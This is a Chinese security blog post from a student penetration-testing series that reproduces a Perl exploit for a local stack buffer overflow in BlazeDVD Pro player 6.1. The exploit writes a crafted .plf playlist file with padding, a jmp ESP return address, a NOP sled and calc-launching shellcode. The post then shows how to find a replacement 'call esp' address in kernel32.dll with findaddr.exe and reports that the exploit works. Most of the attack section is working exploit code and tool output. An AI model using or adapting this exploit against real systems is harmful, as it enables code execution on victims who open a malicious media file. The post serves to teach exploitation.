学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

暗月博客 2019年11月21日21:08:41评论654 views字数 3186阅读10分37秒阅读模式
摘要

学员渗透录 十九 BlazeDVD Pro player 6.1缓冲区溢出使用 作者:新月 依旧是我们的新月的新作,以下就我们来围观,看整人。

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出使用

作者:新月

依旧是我们的新月的新作,以下就我们来围观,看整人。

惯例AD(渗透暗月,学代码审计,找暗月,最近在筹办第四季度,有什么好的建议也可以留言咯)

以下是正文:

朋友发来个一个播放器的exp

http://www.exploit-db.com/exploits/26889/

#!/usr/bin/perl   # BlazeDVD Pro player 6.1  Local stack based buffer overflow # Author: PuN1sh3r # Email: [email protected] # Date: Mon Jul 15 03:01:37 EDT 2013 # Vendor link: http://www.blazevideo.com/download.htmm # Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro # App Version: 6.1 # Tested on: Windows 2003 server sp1(EN) # special thanks to corelanc0d3r for his amazing tutorials     $file = "blazeExpl.plf"; $junk = "/x41" x 260; $eip = "/x33/xFE/xE4/x77"; #jmp ESP on kernel32.dll   #msf win/exec calc.exe [*] x86/alpha_mixed $shellcode = "/x89/xe7/xda/xd4/xd9/x77/xf4/x5b/x53/x59/x49/x49/x49/x49" . "/x49/x49/x49/x49/x49/x49/x43/x43/x43/x43/x43/x43/x37/x51" . "/x5a/x6a/x41/x58/x50/x30/x41/x30/x41/x6b/x41/x41/x51/x32" . "/x41/x42/x32/x42/x42/x30/x42/x42/x41/x42/x58/x50/x38/x41" . "/x42/x75/x4a/x49/x49/x6c/x78/x68/x4d/x59/x67/x70/x77/x70" . "/x43/x30/x65/x30/x6b/x39/x5a/x45/x76/x51/x59/x42/x52/x44" . "/x6e/x6b/x71/x42/x46/x50/x6e/x6b/x56/x32/x36/x6c/x4e/x6b" . "/x53/x62/x66/x74/x6c/x4b/x33/x42/x36/x48/x34/x4f/x6f/x47" . "/x51/x5a/x75/x76/x75/x61/x39/x6f/x45/x61/x79/x50/x6c/x6c" . "/x67/x4c/x70/x61/x53/x4c/x66/x62/x36/x4c/x57/x50/x5a/x61" . "/x7a/x6f/x46/x6d/x63/x31/x5a/x67/x4a/x42/x4a/x50/x72/x72" . "/x33/x67/x6c/x4b/x76/x32/x76/x70/x6c/x4b/x53/x72/x35/x6c" . "/x46/x61/x4a/x70/x6e/x6b/x31/x50/x50/x78/x6b/x35/x39/x50" . "/x54/x34/x62/x6a/x67/x71/x4e/x30/x30/x50/x6c/x4b/x52/x68" . "/x35/x48/x6e/x6b/x70/x58/x51/x30/x43/x31/x6a/x73/x5a/x43" . "/x55/x6c/x43/x79/x6c/x4b/x37/x44/x4c/x4b/x37/x71/x69/x46" . "/x36/x51/x39/x6f/x46/x51/x4f/x30/x4e/x4c/x4f/x31/x5a/x6f" . "/x64/x4d/x37/x71/x5a/x67/x46/x58/x79/x70/x43/x45/x4b/x44" . "/x77/x73/x31/x6d/x4b/x48/x47/x4b/x51/x6d/x46/x44/x50/x75" . "/x39/x72/x30/x58/x6c/x4b/x53/x68/x75/x74/x35/x51/x59/x43" . "/x65/x36/x6c/x4b/x36/x6c/x52/x6b/x6e/x6b/x42/x78/x47/x6c" . "/x63/x31/x48/x53/x6e/x6b/x63/x34/x4e/x6b/x56/x61/x7a/x70" . "/x6c/x49/x73/x74/x34/x64/x56/x44/x63/x6b/x53/x6b/x43/x51" . "/x61/x49/x43/x6a/x66/x31/x4b/x4f/x4b/x50/x31/x48/x71/x4f" . "/x33/x6a/x6c/x4b/x32/x32/x48/x6b/x6e/x66/x31/x4d/x51/x7a" . "/x76/x61/x6c/x4d/x6e/x65/x4f/x49/x37/x70/x67/x70/x63/x30" . "/x72/x70/x70/x68/x44/x71/x4e/x6b/x32/x4f/x6b/x37/x39/x6f" . "/x38/x55/x4f/x4b/x7a/x50/x6d/x65/x6c/x62/x70/x56/x55/x38" . "/x6f/x56/x4d/x45/x6d/x6d/x6f/x6d/x39/x6f/x4b/x65/x55/x6c" . "/x74/x46/x63/x4c/x55/x5a/x6d/x50/x49/x6b/x6b/x50/x64/x35" . "/x67/x75/x6f/x4b/x72/x67/x57/x63/x71/x62/x62/x4f/x30/x6a" . "/x57/x70/x36/x33/x69/x6f/x68/x55/x73/x53/x61/x71/x72/x4c" . "/x30/x63/x44/x6e/x70/x65/x32/x58/x32/x45/x65/x50/x41/x41"; $junk .= $eip . "/x90" x 50 . $shellcode ; ############################################################### open(FILE,">$file"); print FILE $junk; close(FILE); ###############################################################

测试一下

 

先用这个exp生成一个漏洞文件

运行

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

生成

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

然后用播放器打开这个文件

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

因为系统版本不同esp的地址也就不同

我们更改一下expesp的地址就可以了

我们用findaddr.exe这个工具搜索系统中的esp地址

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

使用方法

findaddr kernel32.dll esp

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

[+]Scanning kernel32.dll for code useable with the esp register

[+]0x7c82385d   call esp

[+]Finished Scanning kernel32.dll for code useable with the esp register

[+]Found 1 usable addresses

Esp地址 0x7c82385d

再用播放器打开

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

成功弹出,O(_)O

暗月:缓冲区溢出就是这么的屌学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:08:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用http://cn-sec.com/archives/71851.html

发表评论

匿名网友 填写信息